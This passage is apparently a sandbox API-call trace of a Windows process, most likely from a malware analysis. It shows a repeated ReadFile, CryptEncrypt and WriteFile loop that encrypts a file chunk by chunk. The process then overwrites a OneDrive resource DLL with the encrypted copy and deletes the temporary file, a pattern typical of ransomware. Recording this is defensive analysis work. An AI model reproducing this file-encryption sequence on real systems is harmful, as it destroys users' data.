lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.070] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.070] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.071] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.071] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.071] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.071] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.072] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.072] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.072] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.072] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.072] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.072] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.072] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.072] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.072] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.073] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.073] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.073] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.073] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.074] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.074] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.074] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.074] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.074] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.074] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.074] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.074] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.074] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.074] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.074] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.074] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.074] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.075] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.075] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.075] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.075] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.075] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.075] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.076] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.076] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.076] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.076] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.076] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.076] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.077] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.077] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.077] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.077] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.077] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.077] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0274.077] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2d0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2e0) returned 1 [0274.077] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x2e0, lpOverlapped=0x0) returned 1 [0274.077] CloseHandle (hObject=0x5d48) returned 1 [0274.078] CloseHandle (hObject=0x5d3c) returned 1 [0274.078] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\de\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\de\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\de\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\de\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0274.086] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\de\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0274.086] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\de\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\de\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0274.088] MoveFileA 